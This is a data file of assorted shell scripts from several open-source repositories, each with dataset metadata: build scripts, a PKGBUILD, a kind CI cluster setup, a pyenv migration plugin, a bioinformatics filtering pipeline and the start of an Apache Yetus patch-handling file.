b7f41a3b38b62c214b5ff2aa5f6e352dad785ef3 | Shell | bh0085/programming | /Bash/killNote.sh | UTF-8 | 70 | 2.71875 | 3 | [] | no_license | if [ $# -eq 1 ]
then
cat $notepad | sed -n "/^$1/ p" > $notepad
fi | true |
0afabaf0c0c625c8b1f5216f0a7a7a623e345866 | Shell | felixbns/venom | /fonctions/managed.sh | UTF-8 | 1,899 | 3.140625 | 3 | [] | no_license | ## Couleurs BASH
DEFAULT="\e[00m"
BLACK="\e[30m"
RED="\e[31m"
GREEN="\e[32m"
ORANGE="\e[33m"
BLUE="\e[34m"
MAGENTA="\e[35m"
CYAN="\e[36m"
WHITE="\e[37m"
## Effets de texte (défaut, gras, souligné)
export DEF="\e[0;0m"
export BOLD="\e[1m"
export UNDER="\e[4m"
eth0=`ifconfig | grep -v -i "ether" | awk {'print $1'} | sed "s/.$//" | grep "eth" | tail -1` > /dev/null 2>&1
wlan0=`ifconfig | awk {'print $1'} | sed "s/.$//" | grep "wlan" | tail -1` > /dev/null 2>&1
IPeth0=`ifconfig $eth0 | grep -w "inet" | awk '{print $2}'` > /dev/null 2>&1
IPwlan0=`ifconfig $wlan0 | grep -w "inet" | awk '{print $2}'` > /dev/null 2>&1
if [ -z $wlan0 ];then
if [ -z $IPeth0 ];then
interface="lo"
else
interface=$eth0
fi
else
interface=$wlan0
fi
ipprivee=`ifconfig $interface | grep -w "inet" | awk '{print $2}'` > /dev/null 2>&1
ippublique=`wget http://checkip.dyndns.org -O - -o /dev/null | cut -d : -f 2 | cut -d \< -f 1` > /dev/null 2>&1
gateway=`ip route | grep "default" | awk {'print $3'}` > /dev/null 2>&1
session=`hostname`
iprange=`ip route | grep "kernel" | awk {'print $1'}` > /dev/null 2>&1
path=`pwd`
ctrl_c() {
echo ""
echo -e -n "$MAGENTA [>]$CYAN Appuiez sur ENTRÉE pour afficher les options.$DEFAULT"
read -e -p "
" -n 1 -s
cd
cd $path/../
./suite.sh
}
echo -e "$MAGENTA [...]$CYAN Désactivation du mode monitor de votre carte Wifi... $DEFAULT"
airmon-ng stop $wlan0 > /dev/null 2>&1
sleep 1
wlan0=`ifconfig | grep "wlan0" | awk {'print $1'} | sed "s/.$//"`
if [ "$wlan0" = "wlan0" ];then
echo -e "$GREEN$BOLD [+]$DEFAULT$CYAN Le mode monitor de votre carte Wifi a été désactivé !$DEFAULT"
else
sleep 1
echo -e "$RED$BOLD [-]$DEFAULT$CYAN La désactivation du mode monitor de votre carte wifi a échoué !$DEFAULT"
fi
echo ""
echo -e -n "$MAGENTA [>]$CYAN Appuiez sur ENTRÉE pour afficher les options.$DEFAULT"
read -e -p "
" -n 1 -s
cd
cd $path/../menus/
./wifi.sh
| true |
1dfea1af32561c2a299e08bf8679163642df4ef7 | Shell | Exim/exim | /doc/doc-scripts/BuildFAQ | UTF-8 | 1,166 | 3.71875 | 4 | [] | no_license | #! /bin/sh
# Script to build the Exim FAQ in text and HTML formats.
/bin/rm -f FAQ.txt* html/FAQ* FAQ-html/* FAQ-html.tar.*
/bin/rm -f config.samples.tar.gz config.samples.tar.bz2
# The FAQchk Perl script checks for the numbers being in order and for the
# right number of blank lines at various places.
faqchk FAQ.src
if [ $? != 0 ]; then exit 1; fi
# HTML version
f2h FAQ.src html
echo "html/FAQ*.html made"
fc2k
echo "html/FAQ-KWIC*.html made"
cp html/FAQ* html/*.txt FAQ-html
echo "copied to FAQ-html"
tar cf FAQ-html.tar FAQ-html
gzip FAQ-html.tar
echo "FAQ-html.tar.gz made"
tar cf FAQ-html.tar FAQ-html
bzip2 -9 FAQ-html.tar
echo "FAQ-html.tar.gz2 made"
# ASCII version
f2txt FAQ.src FAQ.txt
echo "FAQ.txt made"
cp FAQ.txt FAQ.txt-t
gzip -v --best FAQ.txt-t
mv FAQ.txt-t.gz FAQ.txt.gz
echo "FAQ.txt.gz made"
cp FAQ.txt FAQ.txt-t
bzip2 -v -9 FAQ.txt-t
mv FAQ.txt-t.bz2 FAQ.txt.bz2
echo "FAQ.txt.bz2 made"
# Configuration samples
tar -chf config.samples.tar config.samples
gzip config.samples.tar
echo "config.samples.tar.gz made"
tar -chf config.samples.tar config.samples
bzip2 -9 config.samples.tar
echo "config.samples.tar.bz2 made"
# End
| true |
855fa1613c3c8d5d7f143a3601d4c2169ed4544e | Shell | nayuta-ueno/lns_test_mqtt | /rrt_cln_mqtt.sh | UTF-8 | 187 | 2.703125 | 3 | [] | no_license | #!/bin/sh
set -eu
TESTNAME=$1
if [ $# -eq 2 ]; then
PORT=$2
ADDR=127.0.0.1
else
PORT=$2
ADDR=$3
fi
python3 mqtt_responser.py ${TESTNAME} clightning ${ADDR} ${PORT} /tmp/light${PORT}
| true |
16ae6c0e56c69dc50b4ce75c8867fd63d661d6de | Shell | fomalhaut88/pi-gpio-server | /backend/build.sh | UTF-8 | 207 | 2.53125 | 3 | [] | no_license | #!/bin/bash
PYTHON_INTERPRETER=python3
if [ ! -d .venv ]; then
$PYTHON_INTERPRETER -m pip install virtualenv
$PYTHON_INTERPRETER -m virtualenv .venv
fi
./.venv/bin/pip install -r requirements.txt
| true |
8f56564a0983b490ac8c24df168ebbcf416d5747 | Shell | mkaczanowski/pkgbuilds | /vim-git/PKGBUILD | UTF-8 | 2,453 | 2.75 | 3 | [] | no_license | # Maintainer: Egor Kovetskiy <e.kovetskiy@office.ngs.ru>
# Maintainer: Mateusz Kaczanowski <kaczanowski.mateusz@gmail.com>
pkgbase='vim-git'
pkgname=('vim-git' 'vim-git-runtime')
pkgver=10985.5e5a98d7d
pkgrel=1
pkgdesc="VIM: Vi IMproved"
arch=('i686' 'x86_64')
url="http://github.com/vim/vim"
license=('GPL')
depends=('gpm' 'ruby' 'lua' 'python2' 'python' 'acl')
optdepends=()
backup=()
options=()
source=("git://github.com/vim/vim.git")
md5sums=('SKIP')
pkgver() {
cd "vim"
echo $(git rev-list --count master).$(git rev-parse --short master)
}
build() {
cd "$srcdir/vim"
sed -i 's|^.*\(#define SYS_.*VIMRC_FILE.*"\) .*$|\1|' src/feature.h
sed -i 's|^.*\(#define VIMRC_FILE.*"\) .*$|\1|' src/feature.h
(cd src && autoconf)
# with-x=yes provides FEAT_XCLIPBOARD which provides FEAT_CLIENTSERVER
./configure \
--prefix=/usr \
--localstatedir=/var/lib/vim \
--with-features=huge \
--with-compiledby='Arch Linux' \
--enable-gpm \
--enable-acl \
--with-x=yes \
--disable-gui \
--enable-multibyte \
--enable-cscope \
--enable-netbeans \
--enable-perlinterp \
--enable-pythoninterp \
--disable-python3interp \
--enable-rubyinterp \
--enable-luainterp
make
}
package_vim-git-runtime() {
provides=('vim-runtime')
conflicts=('vim-runtime')
pkgdesc+=' (shared runtime)'
optdepends=('sh: support for some tools and macros'
'python: demoserver example tool'
'gawk: mve tools upport')
backup=('etc/vimrc')
cd "$srcdir/vim"
make -j1 VIMRCLOC=/etc DESTDIR="${pkgdir}" install
# man and bin files belong to 'vim'
rm -r "${pkgdir}"/usr/share/man/ "${pkgdir}"/usr/bin/
# no desktop files and icons
rm -r "${pkgdir}"/usr/share/{applications,icons}
# license
install -dm 755 "${pkgdir}"/usr/share/licenses/vim-runtime
ln -s /usr/share/vim/vim${_versiondir}/doc/uganda.txt \
"${pkgdir}"/usr/share/licenses/vim-runtime/license.txt
}
package_vim-git() {
provides=('vim')
conflicts=('vim')
cd "$srcdir/vim"
make -j1 VIMRCLOC=/etc DESTDIR="${pkgdir}" install
rm "${pkgdir}"/usr/bin/{ex,view}
find "${pkgdir}"/usr/share/man -type d -name 'man1' 2>/dev/null | \
while read _mandir; do
cd ${_mandir}
rm -f ex.1 view.1
rm -f evim.1
done
rm -r "${pkgdir}"/usr/share/vim
install -Dm644 runtime/doc/uganda.txt \
"${pkgdir}"/usr/share/licenses/${pkgname}/license.txt
}
| true |
84ef0840faeb9b48d2fcf8df5384c685471f4aac | Shell | dariost/logisim-or1k-cpu | /util/toolchain.sh | UTF-8 | 1,220 | 2.625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
mkdir -p /tmp/or1k
mkdir -p "$HOME""/or1k/bin"
pushd /tmp/or1k
wget "http://ftp.gnu.org/gnu/binutils/binutils-2.25.1.tar.bz2"
wget "ftp://sourceware.org/pub/newlib/newlib-2.3.0.20160104.tar.gz"
git clone "https://github.com/openrisc/or1k-gcc.git"
export PREFIX="$HOME""/or1k"
export PATH="$PATH:$PREFIX/bin"
tar xjvf "binutils-2.25.1.tar.bz2"
tar xzvf "newlib-2.3.0.20160104.tar.gz"
mkdir build-binutils
cd build-binutils
../binutils-2.25.1/configure --target=or1k-elf --prefix=$PREFIX --enable-shared \
--disable-itcl --disable-tk --disable-tcl --disable-winsup --disable-gdbtk \
--disable-libgui --disable-rda --disable-sid --disable-sim --with-sysroot
make -j4
make install
cd ..
mkdir build-gcc-stage1
cd build-gcc-stage1
../or1k-gcc/configure --target=or1k-elf --prefix=$PREFIX --enable-languages=c --disable-shared --disable-libssp
make -j4
make install
cd ..
mkdir build-newlib
cd build-newlib
../newlib-2.3.0.20160104/configure --target=or1k-elf --prefix=$PREFIX
make -j4
make install
cd ..
mkdir build-gcc-stage2
cd build-gcc-stage2
../or1k-gcc/configure --target=or1k-elf --prefix=$PREFIX --enable-languages=c,c++ --disable-shared --disable-libssp --with-newlib
make -j4
make install
cd ..
popd
| true |
a37621989ce340e377a8281ded41f08e70057564 | Shell | IPv4v6/dockerfiles | /debian/squeeze/20140101/buildfs.sh | UTF-8 | 448 | 3 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -e
set -u
DIST=squeeze
DATE=20140101
BUILDROOT=~/BUILDROOT
TARGET=${BUILDROOT}/${DIST}-${DATE}
MIRROR=http://snapshot.debian.org/archive/debian/20140101T042327Z/
mkdir -p ${TARGET}
debootstrap --verbose --variant=minbase ${DIST} ${TARGET} ${MIRROR}
echo "${DIST}" > ${TARGET}/etc/hostname
rm -rf ${TARGET}/var/cache/apt/archives
rm -rf ${TARGET}/var/lib/apt/lists
tar -cJvf ./rootfs-${DIST}-${DATE}.tar.xz -C ${TARGET} .
| true |
92bbbee05c70c370276fd7f72ee19fb997ba5982 | Shell | keplerlab/idea2life | /ai/data/scripts/get_classes.sh | UTF-8 | 237 | 3.15625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
if [[ $# -eq 0 ]] ; then
echo 'Provide AILab JSON file name.'
exit 0
fi
cat $1 | grep "tagName" | cut -d ":" -f 2 | tr -d '", ' | sort | uniq > predefined_classes.txt
echo 'Lables saved in: predefined_classes.txt'
| true |
2523f7a4768620d7daa69fcd299a28ae4bc03450 | Shell | svenXY/pyenv-virtualenv-migrate | /bin/pyenv-virtualenv-migrate | UTF-8 | 2,498 | 4.28125 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
#
# Summary: Migrate all virtualenvs from a Python version to another
#
# Usage: pyenv virtualenv-migrate [-d|-h] <from> <to>
#
# -d Attempt to remove the old virtualenv after migration.
# User would be prompted for confirmation.
# -f Do not prompt at any step
# -h Display help
#
set -e
[ -n "$PYENV_DEBUG" ] && set -x
# Provide pyenv completions
if [ "$1" = "--complete" ]; then
exec pyenv-versions --bare
fi
if [ -z "$PYENV_ROOT" ]; then
PYENV_ROOT="${HOME}/.pyenv"
fi
usage() {
pyenv-help virtualenv-migrate [venv name regex] 2>/dev/null
[ -z "$1" ] || exit "$1"
}
migration_failed() {
{ echo
echo "VIRTUALENV MIGRATION FAILED"
echo
echo "Inspect or clean up the virtualenv: ${VENV_NAME}"
echo " old: ${VENV_SRC}"
echo " new: ${VENV_DST}"
} 1>&2
exit 1
}
# Parse arguments
unset DELETE
unset FORCE
while getopts "dfh" arg; do
case $arg in
d) DELETE=true;;
f) FORCE="-f";;
h) usage 1
esac
done
src="${@:$OPTIND:1}"
dst="${@:$OPTIND+1:1}"
regex="${@:$OPTIND+2:1}"
shift $((OPTIND-1))
if [ -n "$regex" ]; then
GREP_CMD="| grep -e $regex"
fi
shift $((OPTIND-1))
[ -n "$src" ] || usage 1
[ -n "$dst" ] || usage 1
pyenv-prefix "$src" 1>/dev/null 2>&1 || {
echo "pyenv: not an installed version: $src" 1>&2
usage 1
}
pyenv-prefix "$dst" 1>/dev/null 2>&1 || {
echo "pyenv: not an installed version: $dst" 1>&2
usage 1
}
VENVS=$(pyenv virtualenvs --skip-aliases | awk "/$src/{print \$1}" $GREP_CMD)
if [ -z "$VENVS" ]; then
echo "pyenv: no virtualenvs to migrate from python version: $src" 1>&2
usage 1
fi
if [ -z "$TMPDIR" ]; then
TMP="/tmp"
else
TMP="${TMPDIR%/}"
fi
SEED="$(date "+%Y%m%d%H%M%S").$$"
LOG_PATH="${TMP}/python-build.${SEED}.log"
trap migration_failed ERR
for VENV_SRC in $VENVS
do
VENV_NAME=$(printf "%s" "${VENV_SRC}" | awk -F'/' '{print $3}' || exit 1)
VENV_DST=$(printf "%s" "${VENV_SRC}" | sed "s|${src}|${dst}|" || exit 1)
# Rename symlink to avoid clash while recreating virtualenv with the same name
VENV_SYMLINK="${PYENV_ROOT}/versions/${VENV_NAME}"
if [ -L "${VENV_SYMLINK}" ]; then
mv -f "${PYENV_ROOT}/versions/${VENV_NAME}" "${PYENV_ROOT}/versions/_${VENV_NAME}_${src}"
fi
printf "%s\n" "Migrating: ${VENV_SRC} -> ${VENV_DST}"
pyenv virtualenv $FORCE "${dst}" "${VENV_DST}"
pyenv migrate "${VENV_SRC}" "${VENV_DST}"
[ -n "$DELETE" ] && pyenv virtualenv-delete $FORCE "${VENV_SRC}" 1>/dev/null
done
pyenv-rehash
trap - ERR
| true |
2e9be3ad63482792dd928e6b752e323e334d5f9e | Shell | hughesyang/backup | /myscript/daily_build_bcm.sh | UTF-8 | 342 | 2.9375 | 3 | [] | no_license | #!/bin/bash
# The script build bcm sdk.
# ----------------------------------------------------------------------------------
# SDK root path
BCM_SDK_BLD_PATH=/home/hughes/f8/aos/bcm/sdk/sdk-build
if [ ! -d ${BCM_SDK_BLD_PATH} ]; then
echo "BCM SDK build dir not exist!"
exit 1
fi
cd ${BCM_SDK_BLD_PATH}
./build_sdk.sh -a x86
exit 0
| true |
b3b3716c0949246570f34018078b2e307116d0c1 | Shell | kubermatic/kubermatic | /hack/ci/setup-kind-cluster.sh | UTF-8 | 6,806 | 3.28125 | 3 | [
"LicenseRef-scancode-dco-1.1",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | # Copyright 2020 The Kubermatic Kubernetes Platform contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
source hack/lib.sh
echodate "Setting up kind cluster..."
if [ -z "${JOB_NAME:-}" ] || [ -z "${PROW_JOB_ID:-}" ]; then
echodate "This script should only be running in a CI environment."
exit 1
fi
export KIND_CLUSTER_NAME="${KIND_CLUSTER_NAME:-kubermatic}"
export KUBERMATIC_EDITION="${KUBERMATIC_EDITION:-ce}"
WITH_WORKERS="${WITH_WORKERS:-}"
WORKERS=''
start_docker_daemon_ci
# Create kind cluster
TEST_NAME="Create kind cluster"
echodate "Preloading the kindest/node image"
docker load --input /kindest.tar
echodate "Creating the kind cluster"
export KUBECONFIG=~/.kube/config
beforeKindCreate=$(nowms)
# If a Docker mirror is available, we tunnel it into the
# kind cluster, which has its own containerd daemon.
# kind current does not allow accessing ports on the host
# from within the cluster and also does not allow adding
# custom flags to the `docker run` call it does in the
# background.
# To circumvent this, we use socat to make the TCP-based
# mirror available as a local socket and then mount this
# into the kind container.
# Since containerd does not support sockets, we also start
# a second socat process in the kind container that unwraps
# the socket again and listens on 127.0.0.1:5001, which is
# then used for containerd.
# Being a docker registry does not incur a lot of requests,
# just a few big ones. For this socat seems pretty reliable.
if [ -n "${DOCKER_REGISTRY_MIRROR_ADDR:-}" ]; then
mirrorHost="$(echo "$DOCKER_REGISTRY_MIRROR_ADDR" | sed 's#http://##' | sed 's#/+$##g')"
# make the registry mirror available as a socket,
# so we can mount it into the kind cluster
mkdir -p /mirror
socat UNIX-LISTEN:/mirror/mirror.sock,fork,reuseaddr,unlink-early,mode=777 TCP4:$mirrorHost &
function end_socat_process {
echodate "Killing socat docker registry mirror processes..."
pkill -e socat
}
appendTrap end_socat_process EXIT
if [ -n "${WITH_WORKERS}" ]; then
WORKERS=' - role: worker
# mount the socket
extraMounts:
- hostPath: /mirror
containerPath: /mirror
- role: worker
# mount the socket
extraMounts:
- hostPath: /mirror
containerPath: /mirror
'
fi
cat << EOF > kind-config.yaml
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: "${KIND_CLUSTER_NAME}"
nodes:
- role: control-plane
# mount the socket
extraMounts:
- hostPath: /mirror
containerPath: /mirror
${WORKERS}
containerdConfigPatches:
# point to the soon-to-start local socat process
- |-
[plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"]
endpoint = ["http://127.0.0.1:5001"]
EOF
kind create cluster --config kind-config.yaml
pushElapsed kind_cluster_create_duration_milliseconds $beforeKindCreate
# unwrap the socket inside the kind cluster and make it available on a TCP port,
# because containerd/Docker doesn't support sockets for mirrors.
docker exec "$KIND_CLUSTER_NAME-control-plane" bash -c 'apt update --quiet; apt install --quiet socat; socat TCP4-LISTEN:5001,fork,reuseaddr UNIX:/mirror/mirror.sock &'
else
if [ -n "${WITH_WORKERS}" ]; then
WORKERS=' - role: worker
- role: worker'
fi
cat << EOF > kind-config.yaml
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: "${KIND_CLUSTER_NAME}"
nodes:
- role: control-plane
${WORKERS}
EOF
kind create cluster --config kind-config.yaml
fi
# This is required if the kindest version matches the user cluster version.
# The kindest image comes with preloaded control plane images, however,
# the preloaded kube-controller-manager image doesn't have cloud providers
# built-in. This is done intentionally in order to reduce the kindest image
# size because kind is used only for local clusters.
# When the kindest version matches the user cluster version, KKP will use the
# preloaded kube-controller-manager image instead of pulling the image from
# k8s.gcr.io. This will cause the kube-controller-manager to crashloop because
# there are no cloud providers in that preloaded image.
# As a solution, we remove the preloaded image after starting the kind
# cluster, which will force KKP to pull the correct image.
docker exec "kubermatic-control-plane" bash -c "crictl images | grep kube-controller-manager | awk '{print \$2}' | xargs -I{} crictl rmi registry.k8s.io/kube-controller-manager:{}" || true
if [ -z "${DISABLE_CLUSTER_EXPOSER:-}" ]; then
# Start cluster exposer, which will expose services from within kind as
# a NodePort service on the host
echodate "Starting cluster exposer"
CGO_ENABLED=0 go build --tags "$KUBERMATIC_EDITION" -v -o /tmp/clusterexposer ./pkg/test/clusterexposer/cmd
/tmp/clusterexposer \
--kubeconfig-inner "$KUBECONFIG" \
--kubeconfig-outer "/etc/kubeconfig/kubeconfig" \
--build-id "$PROW_JOB_ID" &> /var/log/clusterexposer.log &
function print_cluster_exposer_logs {
if [[ $? -ne 0 ]]; then
# Tolerate errors and just continue
set +e
echodate "Printing cluster exposer logs"
cat /var/log/clusterexposer.log
echodate "Done printing cluster exposer logs"
set -e
fi
}
appendTrap print_cluster_exposer_logs EXIT
TEST_NAME="Wait for cluster exposer"
echodate "Waiting for cluster exposer to be running"
retry 5 curl -s --fail http://127.0.0.1:2047/metrics -o /dev/null
echodate "Cluster exposer is running"
echodate "Setting up iptables rules for to make nodeports available"
KIND_NETWORK_IF=$(ip -br addr | grep -- 'br-' | cut -d' ' -f1)
KIND_CONTAINER_IP=$(docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $KIND_CLUSTER_NAME-control-plane)
iptables -t nat -A PREROUTING -i eth0 -p tcp -m multiport --dports=30000:33000 -j DNAT --to-destination $KIND_CONTAINER_IP
# By default all traffic gets dropped unless specified (tested with docker server 18.09.1)
iptables -t filter -I DOCKER-USER -d $KIND_CONTAINER_IP/32 ! -i $KIND_NETWORK_IF -o $KIND_NETWORK_IF -p tcp -m multiport --dports=30000:33000 -j ACCEPT
# Docker sets up a MASQUERADE rule for postrouting, so nothing to do for us
echodate "Successfully set up iptables rules for nodeports"
fi
echodate "Kind cluster $KIND_CLUSTER_NAME is up and running."
| true |
646ba0e503ecc79251a32db8e4c7b369f4e496ff | Shell | microgenomics/MAGnifico | /data_filtering.sh | UTF-8 | 1,456 | 3.109375 | 3 | [] | no_license | #!/bin/bash
#---define samples
samples="G1-1 G1-2 G1-3 G2-1 G2-2 G2-3"
#---define directories
cleaneddir="/datos/fgutzwiller/cleaned_data/rhizosphere_2017/no_cut"
filtereddir="/datos/fgutzwiller/filtered_data/rhizosphere_2017/no_cut"
datadir="/datos/fgutzwiller/database"
for i in $samples
do
#map reads to plastid end to end mode and keep unmapped reads
bowtie2 -p 20 -x $datadir/plastid/plastid -1 $cleaneddir/${i}_1.fastq -2 $cleaneddir/${i}_2.fastq -U $cleaneddir/${i}_1_singletons.fastq,$cleaneddir/${i}_2_singletons.fastq --end-to-end --un-conc $filtereddir/${i}_tmp1 --un $filtereddir/${i}_singleton_tmp1
#map reads to mitochondria end to end mode and keep unmapped reads
bowtie2 -p 20 -x $datadir/mitochondria/mitochondrion -1 $filtereddir/${i}_tmp1.1 -2 $filtereddir/${i}_tmp1.2 -U $filtereddir/${i}_singleton_tmp1 --end-to-end --un-conc $filtereddir/${i}_tmp2 --un $filtereddir/${i}_singleton_tmp2
#map reads to plant genomes end to end mode and keep unmapped reads
bowtie2 -p 20 -x $datadir/plants/plants_all -1 $filtereddir/${i}_tmp2.1 -2 $filtereddir/${i}_tmp2.2 -U $filtereddir/${i}_singleton_tmp2 --end-to-end --un-conc $filtereddir/${i}_filtered --un $filtereddir/${i}_singleton_filtered
#rename output files
mv $filtereddir/${i}_filtered.1 $filtereddir/${i}_filtered_1.fastq
mv $filtereddir/${i}_filtered.2 $filtereddir/${i}_filtered_2.fastq
mv $filtereddir/${i}_singleton_filtered $filtereddir/${i}_singleton_filtered.fastq
done
| true |
ada28bd1ba65eaec30310e83773db606f52be549 | Shell | casperklein/bash-pack | /exe | UTF-8 | 3,690 | 4.25 | 4 | [] | no_license | #!/bin/bash
set -ueo pipefail
# whats my name?
APP=${0##*/}
# Uncomment to enable command logging to file
#LOG="/tmp/$APP.history"
# force color?
[ "${1:-}" == "--color" ] && COLOR=1 && shift || COLOR=0
# no tty? no colors!
tty -s || [ "$COLOR" -eq 1 ] && RED=$'\e[0;31m' || RED=
tty -s || [ "$COLOR" -eq 1 ] && GREEN=$'\e[0;32m' || GREEN=
tty -s || [ "$COLOR" -eq 1 ] && YELLOW=$'\e[0;33m' || YELLOW=
tty -s || [ "$COLOR" -eq 1 ] && RESET=$'\e[0m' || RESET= # reset fg/bg color
tty -s || [ "$COLOR" -eq 1 ] && DELETE=$'\r\033[K' || DELETE=$'\n' # delete current line
_exe() {
local i CMD CODE COUNT ERROR RESULT SPACE
# multiple arguments? try to escape if necessary
if [ $# -gt 1 ]; then
# Legacy (multiple arguments; kept for compatibility)
for i in "$@"; do
# escape bash operators & build-ins
if [[ "$i" =~ ^[0-9\<\>\|\&\*\;]+$|^time$ ]]; then
CMD+=" $i"
else
# since we use ' ourself, we need to escape it
#i=$(echo "$i" | sed 's/'\''/'\''\\'\'\''/g') # use printf, to avoid problems with echo options in $i, e.g. -n
# shellcheck disable=SC1003
i=$(printf "%s\n" "$i" | sed 's/'\''/'\''\\'\'\''/g')
CMD+=' '\'"$i"\'
fi
done
CMD=${CMD:1}
else
CMD=$1
fi
# logging
if [ -n "${LOG:-}" ]; then
printf "%s\t%s\n" "$(date '+%F %T')" "$CMD" >> "$LOG"
fi
# in progress
printf "%s" "[ $YELLOW..$RESET ] $YELLOW>>$RESET $CMD"
if RESULT=$(bash -c "$CMD" 2>&1); then
# success; is there output?
[ -n "$RESULT" ] && {
# more than one line output?
if [[ "$RESULT" == *$'\n'* ]]; then
COUNT=$(( ${#CMD} + 14 ))
SPACE=$(printf "%${COUNT}s")
RESULT=$(echo -n "$RESULT" | sed "s/^/$SPACE/g")
RESULT=${RESULT:$COUNT}
fi
RESULT=" $YELLOW>>$RESET $GREEN$RESULT$RESET"
}
echo -n "$DELETE"
printf "%s\n" "[$GREEN OK $RESET] $YELLOW>>$RESET $CMD$RESULT"
exit 0
else
# errocode > 0
CODE=$?
# is there output?
[ -n "$RESULT" ] && {
# more than one line output?
if [[ "$RESULT" == *$'\n'* ]]; then
COUNT=$(( ${#CMD} + 17 ))
SPACE=$(printf "%${COUNT}s")
RESULT=$(echo -n "$RESULT" | sed "s/^/$SPACE/g")
RESULT=${RESULT:$COUNT}
fi
RESULT=" $YELLOW>>$RESET $RED$RESULT$RESET"
}
echo -n "$DELETE"
printf "%s\n" "[$RED ERROR $RESET] $YELLOW>>$RESET $CMD$RESULT"
exit "$CODE"
fi
}
_line() {
echo
printf '%.0s-' $(seq 1 ${COLUMNS:-80})
echo
echo
}
_usage() {
local DEMO ERROR
echo "Executes a command and show result/output in a nice way. Original return code is preserved."
echo
echo "Usage: $APP [--color] <command>"
echo
echo " --color force color usage"
echo " <command> command to execute"
echo
_line
# shellcheck disable=SC2140
echo "Example: $YELLOW$APP "\""echo 'hello world'\"$RESET"
echo
DEMO=$("$APP" "echo 'hello world'")
ERROR=$?
echo "Result:"
echo
echo "$DEMO"
echo "Return code: $GREEN$ERROR$RESET"
_line
# shellcheck disable=SC2140
echo "Example with error: $YELLOW$APP "\""echo 'hello world'; false\"$RESET"
echo
set +e
DEMO=$("$APP" "echo 'hello world'; false")
ERROR=$?
set -e
echo "Result:"
echo
echo "$DEMO"
echo "Return code: $RED$ERROR$RESET"
_line
echo "Example with pipe: $YELLOW$APP 'echo foo | cat'$RESET"
echo
DEMO=$("$APP" 'echo foo | cat')
ERROR=$?
echo "Result:"
echo
echo "$DEMO"
echo "Return code: $GREEN$ERROR$RESET"
_line
echo "(Deprecated) Example with multible arguments and escaped pipe: $YELLOW$APP echo foo '|' cat$RESET"
echo
DEMO=$("$APP" echo foo '|' cat)
ERROR=$?
echo "Result:"
echo
echo "$DEMO"
echo "Return code: $GREEN$ERROR$RESET"
echo
exit 1
} >&2
# no arguments? show usage
[ $# -lt 1 ] && _usage
_exe "$@"
| true |
9b66818d7b4f409f22c378f5b0114aa1097cac2a | Shell | zhuomanliu/SCGN | /test.sh | UTF-8 | 249 | 2.78125 | 3 | [
"BSD-3-Clause"
] | permissive | #!/usr/bin/env bash
#1 gpu id , #2 dataset, #3 model name, #4 output folder name
echo "[GPU: " $1 "] Testing on " $2 " dataset"
CUDA_VISIBLE_DEVICES=$1 python main.py --mode='test' --dataset=$2 --model=$3 --output_folder=$4
echo "Testing done." | true |
85f9dcf64036d20093b5bfb513f862dfcb21d0f1 | Shell | apache/yetus | /precommit/src/main/shell/core.d/patchfiles.sh | UTF-8 | 11,525 | 3.421875 | 3 | [
"MIT",
"OFL-1.1",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/usr/bin/env bash
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#shellcheck disable=SC2034
INPUT_PATCH_FILE=""
#shellcheck disable=SC2034
INPUT_DIFF_FILE=""
#shellcheck disable=SC2034
INPUT_APPLIED_FILE=""
#shellcheck disable=SC2034
INPUT_APPLY_TYPE=""
PATCH_METHOD=""
PATCH_METHODS=("gitapply" "patchcmd")
PATCH_LEVEL=0
PATCH_HINT=""
## @description Use curl to download the patch as a last resort
## @audience private
## @stability evolving
## @param patchloc
## @param output
## @return 0 got something
## @return 1 error
function generic_locate_patch
{
declare input=$1
declare output=$2
if [[ "${OFFLINE}" == true ]]; then
yetus_debug "generic_locate_patch: offline, skipping"
return 1
fi
if ! ${CURL} --silent -L \
--output "${output}" \
"${input}"; then
yetus_debug "generic_locate_patch: failed to download the patch."
return 1
fi
return 0
}
## @description Given a possible patch file, guess if it's a patch file
## @description only using the more intense verify if we really need to
## @audience private
## @stability evolving
## @param path to patch file to test
## @return 0 we think it's a patch file
## @return 1 we think it's not a patch file
function guess_patch_file
{
declare patch=$1
declare fileOutput
if [[ ! -f ${patch} ]]; then
return 1
fi
yetus_debug "Trying to guess if ${patch} is a patch file."
fileOutput=$("${FILE}" "${patch}")
if [[ $fileOutput =~ \ diff\ ]]; then
yetus_debug "file magic says it's a diff."
return 0
fi
fileOutput=$(head -n 1 "${patch}" | "${GREP}" -E "^(From [a-z0-9]* Mon Sep 17 00:00:00 2001)|(diff .*)|(Index: .*)$")
#shellcheck disable=SC2181
if [[ $? == 0 ]]; then
yetus_debug "first line looks like a patch file."
return 0
fi
patchfile_dryrun_driver "${patch}"
}
## @description Provide a hint on what tool should be used to process a patch file
## @description Sets PATCH_HINT to provide the hint. Will not do anything if
## @description PATCH_HINT or PATCH_METHOD is already set
## @audience private
## @stability evolving
## @replaceable no
## @param path to patch file to test
function patch_file_hinter
{
declare patch=$1
if [[ -z "${patch}" ]]; then
generate_stack
fi
if [[ -z "${PATCH_HINT}" ]] && [[ -z "${PATCH_METHOD}" ]]; then
